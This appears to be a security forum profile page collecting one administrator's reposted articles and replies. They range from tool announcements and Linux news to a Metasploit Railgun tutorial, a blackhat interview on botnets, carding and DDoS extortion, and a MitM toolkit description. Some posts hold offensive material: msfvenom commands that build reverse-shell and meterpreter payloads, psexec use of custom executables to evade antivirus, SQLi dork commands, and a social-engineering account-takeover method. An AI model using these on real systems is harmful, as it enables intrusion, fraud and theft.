Nytro
Administrators
Posts: 18715
Days Won: 701

Everything posted by Nytro

  1. WinObjEx64 Windows Object Explorer 64-bit
     WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 lets you view and edit object-related security information if you have the required access rights.
     System Requirements
     WinObjEx64 does not require administrative privileges. However, administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP; Windows Vista is partially supported. We have no plans for their full support. In order to use all program features Windows must be booted in DEBUG mode.
     Build
     WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions.
     Authors
     © 2015 WinObjEx64 Project
     Original WinObjEx © 2003 - 2005 Four-F
     Source: https://github.com/hfiref0x/WinObjEx64
  2. Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching
     The 3.x branch of the Linux kernel has been dropped
     After letting users decide the version numbering of the Linux kernel software, as Softpedia reported two weeks ago based on Linus Torvalds’ Google+ poll for Linux kernel 3.20/4.0, the time has come for a change, as Linus Torvalds was proud to announce today the immediate availability for testing of the first RC (Release Candidate) version of the forthcoming Linux 4.0 kernel.
     This RC1 version is the first development release of what will become Linux kernel 4.0 in approximately 3-4 months. The final version of Linux kernel 4.0 will most probably arrive by summer 2015, when every kernel maintainer will go on vacation. However, Linus Torvalds tries to assure people that a version number change won’t bring any major features or break compatibility with previous releases.
     “Because the people have spoken, and while most of it was complete gibberish, numbers don't lie. People preferred 4.0, and 4.0 it shall be. Unless somebody can come up with a good argument against it. On the other hand, the strongest argument for some people advocating 4.0 seems to have been a wish to see 4.1.15 - because ‘that was the version of Linux skynet used for the T-800 terminator,’” says Linus Torvalds in the mailing list announcement.
     Live patching will be implemented in the final release of Linux kernel 4.0
     Without further ado, you can download the Linux kernel 4.0 RC1 right now via Softpedia or directly from the kernel.org website, whichever suits you best. We remind you that it’s an unstable version that should not be installed on production machines.
     According to Linus Torvalds’ notes, it is a fairly small release, but not much smaller than the usual RC versions. Prominent features include various vm cleanups, and the unification of the PROTNONE and NUMA handling for page tables. The final release of Linux kernel 4.0 will also include the highly anticipated live patching infrastructure.
     By Marius Nestor
     Source: Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching - Softpedia
  3. Senior PHP & MySQL Developer
     Knowledge and Skills
     • Medium/Advanced knowledge of PHP & MySQL;
     • Medium/Advanced knowledge of XHTML, CSS, JS, XML, CSS & HTML, AJAX;
     • Medium/Advanced knowledge of OOP programming;
     • Capacity to understand and adapt quickly to the working model of some complex and mature applications;
     • Experience in developing web applications;
     • Ability to create a flexible design and capacity to write well-structured code;
     • Talented and fast learner;
     • Reliable, loyal, motivated and ambitious, ready for long term collaboration;
     Responsibilities
     • You will develop and expand our product platform, along with your colleagues;
     • You will work on long-term running projects for our clients;
     The following represent an advantage
     • University education in Computer Science, Informatics, Engineering, Cybernetics;
     • Experience with the SVN versioning system;
     • Knowledge of the required methods of working with Smarty;
     • Be thorough, have good attention to detail and display a high level of accuracy;
     • Strong analytical, creative thinking;
     Job benefits
     • Open minded team of highly skilled colleagues
     • Modern environment, office building, downtown location
     • Attractive financial and benefits package
     • Relaxation at the dcs plus lounge together with colleagues and friends – bar, cinema, chill out area, billiards, ping-pong, darts, food court
     • Other benefits: fruits and coffee on the house, medical insurance, teambuildings
     Details from @Cheater
  4. (Still) I don't know Python, but open "site . com /interface/ipsconnect/ipsconnect.php ?" from the browser and see what response you get.
  5. It depends on which services you have enabled:
     - account maintenance fee ~ 3-4 RON
     - Internet banking ~ 3-4 RON
     - SMS alerts ~ 3-4 RON
  6. Hyperion-1.2.zip
     Description: Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and is based on the paper "Hyperion: Implementation of a PE-Crypter".
     MD5: dc31d022b124dc92e7c362a62e64bd46
     Author: belial
     Source: nullsecurity
  7. exrs
     Exercises for learning Reverse Engineering and Exploitation. All binaries for these challenges are ELF 64-bit LSB executable, x86-64.
     reverse engineering
     The goal is to run the challenges like this: ./rX password, and have them print out "password OK". It's reverse engineering, not cracking. So don't patch the binaries if you want to play by the rules. It gets really boring if you don't anyway.
     sploit
     All the sploit exercises are designed to be solvable with NX+ASLR without being dependent on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service; argv & env are not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun!
     Link: https://github.com/wapiflapi/exrs
  8. Accessing the Windows API Directly
     February 19, 2015
     If you are into pentesting I am sure you might have heard about the IRB shell in the Metasploit framework. This will be a small post about accessing the Windows API using Railgun. Using Railgun we can access different functions in DLLs during runtime in memory. We could also write our own DLLs and call them directly using Railgun. This technique is used in the Meterpreter scripts and post exploitation modules to access the API to perform automated tasks. For demonstration I will be using a Windows 7 machine as the target and Kali as the attacker machine. After owning the box, in the meterpreter session type “irb” and from there we can start the interactive ruby shell. The “client” will be our meterpreter client. We can access common API calls like this. Suppose I want to get the system information.
         client.sys.config.sysinfo
     Get the user ID
         client.sys.config.getuid
     Get all network interfaces. To verify the return type of the object, type .class at the end. In this case it’s an array.
         init = client.net.config.interfaces
         init.each { |x| puts x.pretty }
     The above are built-in calls. Using Railgun we can access the Windows API directly. The syntax would be:
         client.railgun.(DLL).(function)(arg 1, arg 2, …)
     I will demonstrate some examples. So suppose I want to access the MessageBox function in the Windows API. It’s located in the “user32” DLL.
         int WINAPI MessageBox(
           _In_opt_ HWND hWnd,
           _In_opt_ LPCTSTR lpText,
           _In_opt_ LPCTSTR lpCaption,
           _In_ UINT uType
         );
     https://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx
     To call the function we can type:
         ?> client.railgun.user32.MessageBoxA(0, "Hello World", "Osanda", "MB_ICONASTERISK | MB_OK")
         => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
     If you want to lock the workstation you could use the “LockWorkStation” API.
         BOOL WINAPI LockWorkStation(void);
     https://msdn.microsoft.com/en-us/library/windows/desktop/aa376875%28v=vs.85%29.aspx
         ?> client.railgun.user32.LockWorkStation()
         => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true}
     Suppose I want to terminate a process. For that I will be using the “OpenProcess” and “TerminateProcess” functions.
         HANDLE WINAPI OpenProcess(
           _In_ DWORD dwDesiredAccess,
           _In_ BOOL bInheritHandle,
           _In_ DWORD dwProcessId
         );
     https://msdn.microsoft.com/en-us/library/windows/desktop/ms684320%28v=vs.85%29.aspx
         BOOL WINAPI TerminateProcess(
           _In_ HANDLE hProcess,
           _In_ UINT uExitCode
         );
     https://msdn.microsoft.com/en-us/library/windows/desktop/ms686714%28v=vs.85%29.aspx
     If I want to terminate the CMD running in the target machine, I’ll first get the handle with “PROCESS_TERMINATE” access and store the return value in a variable, and next call the “TerminateProcess” API to terminate the process.
         ?> client.railgun.kernel32.OpenProcess("PROCESS_TERMINATE", false, 3664)
         => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>4692}
         >> phandle = _['return']
         => 4692
         >> client.railgun.kernel32.TerminateProcess(phandle, 0)
         => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true}
         >>
     Likewise you could do cool stuff by directly accessing the API during runtime. Read the prototype of the function and apply it accordingly using Railgun. If you want to find the functions loaded into Railgun for a specific DLL, just get the exception error message and you will see the functions loaded.
     Now let’s try to add a new DLL which is not shipped by default into Railgun. To check the available DLLs, type:
         ?> client.railgun.known_dll_names
         => ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]
         >>
     Let’s try to add “mpr.dll” into Railgun at runtime and try to access a function. This would be the syntax:
         client.railgun.add_dll(Name, Path)
     To add “mpr.dll” we can enter it like this:
         client.railgun.add_dll("mpr", "C:/windows/system32/mpr.dll")
     After that you should add the function. To view the functions of a DLL I will be using DLL Export Viewer by Nirsoft; feel free to use any utility you like. I would like to use the “WNetGetUserW” function. Let’s check the function on MSDN.
         DWORD WNetGetUser(
           _In_ LPCTSTR lpName,
           _Out_ LPTSTR lpUserName,
           _Inout_ LPDWORD lpnLength
         );
     https://msdn.microsoft.com/en-us/library/windows/desktop/aa385476%28v=vs.85%29.aspx
     We should follow the syntax of Railgun.
         client.railgun.add_function("mpr", "WNetGetUserW", "DWORD", [
           ["PWCHAR", "lpName", "in"],
           ["PWCHAR", "lpUserName", "out"],
           ["PDWORD", "lpnLength", "inout"]
         ])
     After adding the function we can run the function passing the arguments:
         >> client.railgun.mpr.WNetGetUserW(nil, 50, 50)
         => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>0, "username"=>"SYSTEM\x00AAAAAAAAAAAAAAAAAA", "lplen"=>50}
     That is how you can access the Windows API using Railgun. For more info about editing modules read their documentation: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation
     MSDN is your friend. To play around with different APIs, apply them according to the information provided by MSDN. Thanks for reading.
     Posted by Osanda Malith in pentesting
     Source: https://osandamalith.wordpress.com/2015/02/19/accessing-the-windows-api-directly/
  9. SystemProgramming
     Welcome to Angrave's crowd-sourced System Programming wiki! This wiki is being built by students and faculty from UIUC. Rather than requiring a book this semester, we will build our own set of resources here.
     Week 1
     C Programming, Part 1: Introduction
     C Programming, Part 2: Text Input And Output
     Informal Glossary of basic terms
     #Piazza: When And How to Ask For Help
     Week 2
     C Programming, Part 3: Common Gotchas
     Forking, Part 1: Introduction
     Forking, Part 2: Fork, Exec, Wait Kill
     Week 3
     Memory, Part 1: Heap Memory Introduction
     Memory, Part 2: Implementing a Memory Allocator
     Memory, Part 3: Smashing the Stack Example
     Pthreads, Part 1: Introduction
     Week 4
     Pthreads, Part 2: Usage in Practice
     Synchronization, Part 1: Mutex Locks
     Synchronization, Part 2: Counting Semaphores
     Week 5
     Synchronization, Part 3: Working with Mutexes And Semaphores
     Synchronization, Part 4: The Critical Section Problem
     Synchronization, Part 5: Condition Variables
     Week 6
     Synchronization, Part 6: Implementing a barrier
     Synchronization, Part 7: The Reader Writer Problem
     Synchronization, Part 8: Ring Buffer Example
     Synchronization, Part 9: The Reader Writer Problem (part 2)
     Week 7
     Deadlock, Part 1: Resource Allocation Graph
     Deadlock, Part 2: Deadlock Conditions
     Week 8
     Todo: Analysis of Dining Philosophers (for now see the discussion section handout)
     ** Breaking Circular Wait. Using a global mutex to break hold-and-wait
     ** Beware of starvation if all philosophers hold their left chopstick and try+release their right chopstick
     Virtual Memory, Part 1: Introduction to Virtual Memory
     Pipes, Part 1: Introduction to pipes
     Pipes, Part 2: Pipe programming secrets
     Files, Part 1: Working with files
     Week 9
     POSIX, Part 1: Error handling
     Networking, Part 1: Introduction
     Networking, Part 2: Using getaddrinfo
     Networking, Part 3: Building a simple TCP Client
     Programming Tricks, Part 1
     Week 10
     Networking, Part 4: Building a simple TCP Server
     Networking, Part 5: Reusing ports
     Scheduling, Part 1: Scheduling Processes
     Week 11
     File System, Part 1: Introduction
     File System, Part 2: Files are inodes (everything else is just data...)
     File System, Part 3: Permissions
     Week 12
     File System, Part 4: Working with directories
     File System, Part 5: Virtual file systems
     File System, Part 6: Memory mapped files and Shared memory
     File System, Part 7: Scalable and Reliable Filesystems
     Networking, Part 6: Creating a UDP server
     Week 13
     Signals, Part 2: Pending Signals and Signal Masks
     Signals, Part 3: Raising signals
     Signals, Part 4: Sigaction
     Week 14
     File System, Part 8: Disk blocks example
     Other content
     C Programming, Part 4: Debugging
     #Example Markdown
     Legal and Licensing information: Unless otherwise specified, submitted content to the wiki must be original work (including text, java code, and media) and you provide this material under a Creative Commons License. If you are not the copyright holder, please give proper attribution and credit to existing content and ensure that you have license to include the materials.
     Source: https://github.com/angrave/SystemProgramming/wiki
  10. Read what is written in red.
  11. Something like that. I don't know where the distinction is made. The FinFisher people are rich and free. Same with the NSA. The laws should be the same for everyone.
  12. He has a permanent ban. You can talk to him at thesevensmarter@gmail.com
  13. Interview With A Blackhat (Part 1)
      [This interview openly discusses criminal activities from the perspective of an admitted criminal. You may find this content distressing, even offensive, but what is described in this interview is real. We know from personal experience that these activities are happening on websites everywhere, every day, and perhaps even on your websites. WhiteHat Security brings this information to light for the sole purpose of assisting those who want to protect themselves and their online business.]
      Over the last few years, I have made myself available to be an ear for the ‘blackhat community.’ The blackhat community, often referred to as the internet underground, is a label describing those participating on the other side of the [cyber] law, who willingly break online terms of service and software licensing agreements, who may trade in warez, exploits, botnets, credit card numbers, social security numbers, stolen account credentials, and so on. For these individuals, or groups of them, there is often a profit motive, but certainly not always.
      Most of the time, the people I speak with in the information security industry understand the usefulness of engaging in dialog with the underground — even if it’s not something they feel comfortable doing themselves. However, I occasionally get questioned as to the rationale — the implication being that if you play with pigs you start to stink. People sometimes even begin to insinuate that one must be bad to know bad people. I think it is incredibly important for security experts to have open dialogues with the blackhat community. It’s not at all dissimilar to police officers talking with drug dealers on a regular basis as part of their job: if you don’t know your adversary you are almost certainly doomed to failure.
      One ‘blackhat,’ who asked to be called Adam, that I have spoken to a lot has recently said he’s decided to go legit. During this life-changing transition, he offered to give an interview so that the rest of the security community could learn from his point of view. Not every blackhat wants to talk, for obvious reasons, so this is a rare opportunity to see the world through his eyes, even if we’re unable to verify any of the claims made. Hopefully by learning how Adam and other blackhats like him think, how they communicate, people can devise better solutions, abandon failed technologies, and fix the most glaring issues. Maybe people reading this can find more effective punishments to deter the criminal behavior before it happens, or ruin the incentives, disable the markets, or find ways to keep people from the allure of criminal activity in the first place. A great deal can be unearthed by examining Adam’s words and those of other blackhats like him. Or maybe we can entice some of them, like this individual, to leave the blackhat life behind completely.
      Adam’s interview took place over a few days, and required a lot of back and forth. Due to the way in which this interview had to take place, a lot of editing was required to make it readable, but primarily to spelling, capitalization and punctuation. In every meaningful sense, these are Adam’s unaltered words. (Note that when Adam refers to “whitehats,” he is referring to legitimate hackers in general, and that this should not be confused with WhiteHat Security the business.)
      This is the first of our three-part interview. The next post will be tomorrow.
      Q: Can you describe what you think your hacking/security related skills are?
      A: My personal expertise and area of knowledge is in social engineering. I think it is pretty obvious I’m a blackhat, so I social engineer to card. Another area of “hacking” (I use the ” as DDoS isn’t really hacking) is botnet building and takedown orders. This is where most money in my opinion is made — where one day can bring in several thousand dollars. The whole blackhat market has moved from manual spreading to fully automated software. In addition, many sites are targeted in malware/info leaks by using some really common and easy methods. These include SQLi, basic and advanced XSS, CSRF, and DNS cache poisoning. Although SQLi is still a big player, XSS has taken over the market. I estimate about 50-60% of the attacks my crew did last year (Jan 1st-Jan 1st) were XSS. I also learned several programming languages — Python, Perl, C, C++, C#, Ruby, SQL, PHP, ASP, just to name a few.
      Q: Can you describe the first time you remember deliberately breaking a computer-related law? Why did you do it and how did you justify it?
      A: Hmmmmm. That was many years ago. The first time I remember was when I was in school (aged about 14). The admins were pretty good at security (for school admins, bear in mind). I was in the library one day and I knew that the admins had remote access to every PC. I also knew the librarian did. The library just so happened to be the place where they marked our exam papers and entered the grades. I was never the genius at school but I was getting mediocre grades. What if I could get ‘A’s and ‘A+’s and not do half the work? So I started to read around. I eventually came across keyloggers. It seemed strange and amazing that a program I could make (with a little research) could get me the top grades. So I did it. I installed the keylogger onto the librarian’s PC and then used the remote administration program to download the file onto the other PCs. I was suspended for two weeks.
      Q: Where did you learn the bulk of your skills?
      A: Books, Google, and the people I began speaking with on irc/forums. Unlike today’s 1337 haxorz (lol) we all shared, spoke, and helped each other. There wasn’t a sense of being mocked because you didn’t know.
      Q: What attracted you to the blackhat way of life?
      A: Money. I found it funny how watching tv and typing on my laptop would earn me a hard worker’s monthly wage in a few hours. [It was] too easy in fact.
      Q: Can you recall a tipping point at which you started considering yourself a blackhat? What was the nature of the event?
      A: It’s difficult really. I and the guys/girls I hung with never called ourselves blackhats, I don’t know, it was just too James Bond like. We just saw ourselves as people who found a way to make money. We didn’t care about what category we were in. It was just easy and funny. Although saying that, I first realized I might be branded a blackhat when my “real life” friend became a victim of credit card fraud. That’s when I realized my actions had real victims and not just numbers that were worth money.
      Q: How many machines do you think you directly controlled at the peak of your botnet activity?
      A: Erm, depends. I had two separate botnets (although some bots cross over). The DDoS botnet contained the bots which were public computers or computers that were in offices. [There were] two reasons I did that. Either: 1. they are on for the majority of the day and have good connection speeds or 2. people weren’t stupid enough to do their banking on them (if you were I’d let a script kiddy have it). Then there was my carding botnet, definitely the most valuable. These were PCs of banks, estate agents, supermarkets and obviously home PCs. I preferred to target PCs where an employee would enter customer data, i.e. banks (yes banks are super easy to bot). This gave me a constant supply of credit cards and a never-ending amount of spam ammo. The DDoS botnet has about 60-70k bots at the moment, most in the west. The carding botnet had a lot less at around 5-10k, most in Asia. 570k is the biggest I’ve controlled.
      Q: How much money do you think you made after expenses per year at your peak doing blackhat activities?
      A: I can’t really go into specifics but when 9/11 happened we were making millions.
      Q: And how much do you think you made last year?
      A: Off the top of my head? Around about 400-500k. Last year was kind of shit. People became wiser, patches became more frequent. This year we have 3/4 of that amount already.
      Q: When you started, did you have a goal in mind to make a certain amount of money or achieve a certain goal?
      A: I get asked this a lot by new people on the forums. I never set myself goals until probably in the last 4 years. I started it out just for easy laughs, bragging rights (lol) and easy, very easy money.
      Q: Can you describe the process that you use to make money with your botnet?
      A: Making money with a botnet is easier than brushing your teeth, especially if you’re in the automated industry. Any crew has several members. The bot master, researcher, reverse engineer, spreader, social engineer, sales man and fudder*. The people who sell 0-days are solely selling 0-days half the time. The buyers are bot masters without a crew. Our crew developed a tool that checks the bot’s cache for Facebook/twitter accounts then checks their Facebook interests (e.g. justin bieber), then age, name, location. So for example bot no. 2 is signed into Facebook. The account likes Justin Bieber, aged 14, female, and lives in America (important to get correct language). Then automatically it selects a pre made list of links and for example would choose the ‘Justin bieber sex tape video’. Using zero days to compromise a website, then insert an iframe is kinda old, boring and sometimes doesn’t bring in the best results — unless of course you’re hijacking a high Alexa rating; then it’s worth it. Combining 0-days to deface the website and then a 0-day in e.g. java to hijack with a drive by is a lot more effective than tricking the user into downloading a file. What a lot of people don’t realize is that emails easily available on their Facebook profile can be sold for spam. Again, this makes more money automatically.
      * A fudder can be a tool that binds to a virus and makes it more difficult for antivirus to detect, or a person specializing in such a tool.
      Q: How easy is it for you to compromise a website and take control over it?
      A: For beginners you can simply Google inurl:money.php?id= — go ahead try it. But most of them will be cancelled or dried up. So, now you target bigger websites. I like to watch the news; especially the financial side of it. Say if a target just started up and it suddenly sky rocketed in online sales that’ll become a target. Most of these websites have admins behind them who have no practical experience of being the bad guy and how the bad guys think. This leaves them hugely vulnerable. They patch SQL but choose a DNS that is vulnerable to DNS cache poisoning. You can break in and be gone within an hour.
      Q: How easy is it for you to take over the ownership of an account via whois information or other publicly available information?
      A: Whois used to be crucial to gaining information. Now people spew it on Facebook, twitter, etc. Companies like Amazon only require name, address and email on the account to add another credit card. You then hang up. Ring the password reset department and tell them as verification the name, address, email and the credit card number you just added (it doesn’t even have to work (lol), just use fakenamegenerator.com) and then you are in. You can now see the ‘legit’ credit card’s last 4 digits. Now you can get an email password reset and you’re in. Amazon says they patched this two years ago but I use this method all the time. Seriously Amazon, train your staff.
      Q: What is your favorite kind of website to compromise? Or are your hack attempts entirely untargeted? What are the easiest sites to monetize?
      A: Most of the time un-targeted but once a company (which I won’t name) pissed me off for not giving me discount in a sale so we leaked every single credit card number online. One type of company I love to target is Internet security, i.e. anti virus companies. There is nothing better than a clothing store at the summer sales (except porn websites). These are in my personal opinion the easiest and most successful targets to breach. I’ll talk about clothes stores first. Clothing websites are SO easy because of two main types of attacks. 1. The admins never ever have two-step authentication. I don’t know why, but I have never seen one admin have it (and I’ve done it thousands of times). 2. The ‘admin’ usually works there behind the tills or in the offices. They have no clue what they’re doing: they just employ someone to make the website then they run it. They never ever have HTTPS, [so they have] huge SQLi vulnerabilities (e.g. inurl: product.php?id=). Once you have the SQLi vulnerability you can go two routes or both. Route one: steal the credit card info and leave. Route two: deface the website, keep the original HTML code but install an iframe that redirects to a drive by download of a banking Trojan. Now to discuss my personal favourite: porn sites. One reason why this is so easy: The admins don’t check to see what the adverts redirect to. Upload an ad of a well-endowed girl typing on Facebook, someone clicks, it does a drive by download again. But this is where it’s different: if you want extra details (for extortion if they’re a business man) you can use SET to get the actual Facebook details which, again, can be used in social engineering.
      Q: What is your favorite/most effective exploit against websites and why?
      A: If it’s a 0-day, that obviously ranks at the top. But below that is XSS. It’s really well known but no one patches it. I suppose DDoS isn’t really classed as an exploit but that can bring in monthly ‘rent’ for our ‘protection’. But over all 0-days are the greatest exploits.
      Q: How do you monetize DDoS?
      A: People buy accounts so for example you rent 1k bots and have a DDoS time limit of 30 mins. Some people buy one-offs. Blackmail is a huge part of it. Take the website down for an hour. Email them or call them and say they pay 200 dollars or it stays offline for good. They usually pay up. If they don’t, they lose days, weeks, months of business.
      Q: How do you pick targets to DDoS when you are attempting to extort them?
      A: Hmmm. It depends. If there is a big sporting event, e.g. the Super Bowl, I can guarantee 95% of bookies have been extorted. I knew of one group who took down a cancer research website and extorted them after their race for life donation process was meant to start. They got their money, kinda sad really.
      Q: What kind of people tend to want to buy access to your botnet and/or what do you think they use it for?
      A: Some people say governments use it, rivals in business. To be honest, I don’t care. If you pay you get a service. Simple.
      This entry was posted in Web Application Security on May 21, 2013 by Robert Hansen.
      Source: https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/
  14. netool.sh V4.4
      MitM PENTESTING OPENSOURCE T00LKIT v4.4 WIKI
      The netool.sh toolkit provides a fast and easy way for new arrivals to IT security pentesting, and also for experienced users, to use almost all features that the Man-In-The-Middle can provide on a local LAN, from scanning and sniffing to social engineering attacks "[spear phishing attacks]"...
      DESCRIPTION "Scanning - Sniffing - Social Engineering"
      Netool: it's a toolkit written using 'bash, python, ruby' that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of the target's web browser surfing (driftnet); it also uses macchanger to decoy scans by changing the mac address.
      Rootsector: this module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using the metasploit, apache2 and ettercap frameworks, like the generation of payloads, shellcode and backdoors delivered using dns_spoof and the MitM method to redirect a target to your phishing webpage.
      Recently the "inurlbr" webscanner (by cleiton) was introduced, which allows us to search for SQL related bugs using several search engines; this framework can also be used in conjunction with other frameworks like nmap (using the flag --comand-vul).
      Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'
      * STABLE repository | GIT repository | CHANGELOG | BUG-REPORTS
      * Operating Systems Supported
      Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS
      Linux-backtrack (discontinued) | Mac osx (discontinued).
      "REMARK"
      The project 'opensource-kali' was built to work on most pentesting distros, like blackbox, parrot, backtrack, kali, etc., with little configuration needed, such as: install the toolkit in the right path, set executable permissions on all files, and configure the paths to dependencies (in the "toolkit_config" file). So it's the obvious choice if you want to install the toolkit on a different distro (than ubuntu or kali).
      * UBUNTU install | KALI install | OTHER DISTROS install | UNIVERSAL INSTALLER
      * Dependencies
      "TOOLKIT DEPENDENCIES" zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip
      "SCANNER INURLBR.php" curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl
      * Install zenity | Install nmap | Install ettercap | Install macchanger | Install metasploit | Install Apache2
      * Credits
      x0ra-machine "Pentesting Lab" | Apofis Kaizer "Debug on Mac OSx"
      Fyodor "Nmap" | ALoR & NaGa "Ettercap" | HD moore "Metasploit"
      Moxie M "Sslstrip" | Chris L "Driftnet" | j0rgan "Cupp.py"
      Cleiton p "inurlbr.php" | ReL1K "unicorn.py"
      "Developed by: pedr0 Ubuntu [r00t-3xp10it]"
      Suspicious Shell Activity Labs@2014 | r00tsect0r CyberTeam Red Team Collaborations
      Source: http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
15. Custom payloads in Metasploit 4

One of the key features of Metasploit is the customization of the framework; for example, different payloads can be generated with many different options and placed in any of a large number of exploits. Custom scripts can be written with many commands for automated post-exploit actions. Nevertheless, there have still been a number of customizations that have been awkward to implement. Many of those deal with adding a payload that isn't in the framework, or modifying it in a way that the framework does not directly support. So for Metasploit 4, I made a few tweaks to increase payload flexibility.

Generic/custom

The first change was the addition of a single custom payload. Prior to this, a custom payload existed for command execution exploits for UNIX (payload/cmd/unix/generic), but there was no analogous payload for command execution exploits for Windows, or for that matter any other architecture or platform. If you are developing a payload that could benefit from Metasploit integration, writing a payload module is preferable. But in some cases, such as generating multiple payloads, Metasploit might not currently support the UI or backend to generate the payload in a conventional way, and you may want to import the payload from a file or option. Or, while writing a payload, it can be easier to import the payload into the framework than to change a module.

Multipayloads

The second change made it easier to combine multiple payloads into one exploit, since you may not get a second chance to exploit your target service, get them to open an exploit document, etc. The first shot at allowing the framework to create a single payload that is a combination of a number of payloads was the "none" exitfunc. Most payloads allow you to set the "EXITFUNC" option. This option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. Usually it is set to thread or process, which corresponds to the ExitThread or ExitProcess calls. I added a 'none' that calls GetLastError, effectively a no-op. The thread will then continue executing, allowing you to simply cat multiple payloads together to be run in serial.

    msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=5555 EXITFUNC=none > pay.raw
    msfvenom -p windows/shell_reverse_tcp -f raw -e generic/none LHOST=192.168.1.2 LPORT=4444 EXITFUNC=none >> pay.raw
    msfvenom -f exe -p - > msf.exe < pay.raw

For some reason that didn't function in my XP vm, but it worked fine in my win7 VM. When the first reverse shell either failed or ran and the shell exited, the second reverse shell was started. Unfortunately this doesn't help you if the first freezes, but it's a start. Unfortunately, the biggest problem is that many payloads don't have a clean execution path after the exitfunc. For example, the windows/exec payload places the exitfunc block before the command to be executed, so instead of running on to the next payload, it tries to execute the ASCII command as x86 instructions. This fails badly.

Parallel multipayloads

The solution is to enable running payloads in parallel, using roughly the same technique as in the exe payload injection code. That code injects a payload into an existing exe to run in a new thread while the old exe code continues to run normally (-f option in msfvenom and msfencode). So now, with the -c option, you can generate shellcode to be run in a new thread while the shellcode in the file specified by the -c option will be run in the main thread. And of course you can continue to add payloads to be run in parallel in subsequent commands.

    $ ruby msfvenom -h
    Usage: msfvenom [options]
    Options:
        ...
        -c, --add-code [path]   Specify an additional win32 shellcode file to include
        -x, --template [path]   Specify a custom executable file to use as a template
        -k, --keep              Preserve the template behavior and inject the payload as a new thread
        ...
    $ ruby msfvenom -p windows/messagebox -f raw EXITFUNC=thread > /tmp/msgbox.raw
    $ ruby msfvenom -p windows/meterpreter/reverse_tcp -f exe -c /tmp/msgbox.raw LHOST=192.168.0.102 EXITFUNC=thread > /tmp/rev102msgbox.exe

This generates an executable that runs a messagebox payload in one thread while a reverse-connect meterpreter is spawned in another thread.

Custom executables

The last change came in response to a number of requests to use a custom executable in the psexec exploit, which generates and drops an executable onto the target system to execute. Since some antivirus products will block Metasploit-generated exes, yet it is not difficult to manually generate an undetected executable, it makes sense to allow exploits like psexec to use an external exe as the payload. This change was implemented in the exe mixin used by executable-dropping exploits, and so is available in all similar exploits as well. The option is the advanced option EXE::Custom.

           =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
    + -- --=[ 725 exploits - 367 auxiliary - 78 post
    + -- --=[ 226 payloads - 27 encoders - 8 nops
           =[ svn r13559 updated today (2011.08.14)

    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set EXE::Custom /tmp/mypayload.exe
    EXE::Custom => /tmp/mypayload.exe

... and proceed normally, without being bothered by pesky antivirus.

Sursa: Custom payloads in Metasploit 4 « Thoughts on Security
16. Various public documents, whitepapers and articles about APT campaigns

APT Notes

This is a repository for various publicly-available documents and notes related to APT, sorted by year. For malware sample hashes, please see the individual reports.

Contributing

For the moment, it would be nice to have a PDF of the article that we add to the list, just to be sure we always have a copy. To contribute, you can either:
- Fork, add and send me a pull request
- Open a ticket with the data you want to be added

Adding data:
- Add a link to the public document to the README.md page
- Add the PDF file to the appropriate year

Thanks to the contributors for helping with the project!

Papers

The papers section contains historical documents.

2006
"Wicked Rose" and the NCPH Hacking Group

2008
Aug 10 - Russian Invasion of Georgia Russian Cyberwar on Georgia
Oct 02 - How China will use cyber warfare to leapfrog in military competitiveness
Nov 04 - China's Electronic Long-Range Reconnaissance
Nov 19 - Agent.BTZ

2009
Jan 18 - Impact of Alleged Russian Cyber Attacks
Mar 29 - Tracking GhostNet

2010
Jan 12 - Operation Aurora
Jan 13 - The Command Structure of the Aurora Botnet - Damballa
Jan 20 - McAfee Labs: Combating Aurora
Jan 27 - Operation Aurora Detect, Diagnose, Respond
Jan ?? - Case Study: Operation Aurora - Triumfant
Feb 24 - How Can I Tell if I Was Infected By Aurora? (IOCs)
Mar 14 - In-depth Analysis of Hydraq
Apr 06 - Shadows in the cloud: Investigating Cyber Espionage 2.0
Sep 03 - The "MSUpdater" Trojan And Ongoing Targeted Attacks
Sep 30 - W32.Stuxnet Dossier
Dec 09 - The Stuxnet Computer Worm: Harbinger of an Emerging Warfare Capability

2011
Feb 10 - Global Energy Cyberattacks: Night Dragon
Feb 18 - Night Dragon Specific Protection Measures for Consideration
